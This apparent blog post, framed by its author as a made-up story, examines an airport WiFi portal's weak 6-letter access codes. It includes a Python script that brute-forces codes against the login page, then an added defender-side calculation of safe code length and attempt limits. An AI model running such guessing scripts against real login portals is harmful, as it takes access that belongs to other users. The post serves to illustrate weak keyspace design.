Title: Mind your keyspace, $airport
Date: 2018-05-09 18:30

(This is of course a completely made up story that I entirely invented because
I was bored.)

Today, I was waiting for my flight in an international airport,
so I thought about giving the WiFi a try.
Unsurprisingly, I was asked for an email address, a full name,
and a working phone number, to send me a 6-letter code.

I mumbled something about the [GDPR](https://en.wikipedia.org/wiki/GDPR)
while reading the captive portal's webpage,
and stumbled upon those two sentences:

> After you register, your code will be stored for 12 months.
> During this period you can reconnect without having to register again.

For extra kindness, the page provides a nice example of
what a code might look like: 6 capital letters.

So, an airport handling a bit less than 30 million passengers per year is using
secret codes with a limit of 26⁶ (308.915.776) different possibilities…
Since the WiFi is *free* (you're paying with your personal data and by
receiving spam), odds are that a significant percentage of the people
are using it. With a conversion rate of ⅛, a blind guess would have a
~1% chance of being correct. Codes give 2h of internet access, and are
automatically reset every 5 hours.

```python
import requests
import string
import itertools

ks = itertools.combinations_with_replacement(string.ascii_uppercase, 6)
for c in ks:
    code = ''.join(c)
    r = requests.post('https://super-airport.plane/login.php', data={'secret_code': code, 'submit': 'Login'})
    # The portal answers 'This code is invalid.' for a wrong code
    if 'This code is invalid.' not in r.text:
        print(code)
        break
```

Resulting in:

```bash
jvoisin@grimhilde 16:03 ~ python test.py
AAAAAL
```

Yay, free WiFi.
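
The same arithmetic from the portal operator's side, as an added example that is not part of the original post: it takes the post's figures (about 30 million passengers a year, ⅛ of them registering, 6 capital letters) and works out how long a code has to be. The limit of 10 failed attempts per client, the one-in-a-million risk target and all function names are assumptions made for the illustration.

```python
import secrets
import string


def hit_probability(active_codes: int, alphabet: int, length: int) -> float:
    """Chance that one uniformly random guess matches some valid code."""
    return min(1.0, active_codes / alphabet ** length)


def success_within(attempts: int, p: float) -> float:
    """Chance of at least one hit in `attempts` independent guesses."""
    return 1.0 - (1.0 - p) ** attempts


def min_length(active_codes: int, alphabet: int, attempts: int, max_risk: float) -> int:
    """Shortest code length keeping success_within(attempts) <= max_risk."""
    length = 1
    while success_within(attempts, hit_probability(active_codes, alphabet, length)) > max_risk:
        length += 1
    return length


def new_code(length: int, alphabet: str = string.ascii_uppercase + string.digits) -> str:
    """Draw a code from the OS CSPRNG instead of a predictable generator."""
    return "".join(secrets.choice(alphabet) for _ in range(length))


# Figures from the post: ~30 million passengers/year, 1/8 register,
# codes stay valid for 12 months.
ACTIVE = 30_000_000 // 8
P_NOW = hit_probability(ACTIVE, 26, 6)

# Assumed policy (not from the post): 10 failed attempts per client,
# acceptable risk of one successful guess in a million clients.
MAX_ATTEMPTS = 10
MAX_RISK = 1e-6

if __name__ == "__main__":
    print(f"per-guess hit chance with 6 capital letters: {P_NOW:.2%}")
    print(f"hit within 100 unthrottled guesses: {success_within(100, P_NOW):.0%}")
    needed = min_length(ACTIVE, 36, MAX_ATTEMPTS, MAX_RISK)
    print(f"length needed with A-Z0-9 and {MAX_ATTEMPTS} attempts: {needed}")
    print("sample code:", new_code(needed))
```

Without an attempt limit no reasonable code length helps, which is why the length is computed for a fixed number of guesses per client.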
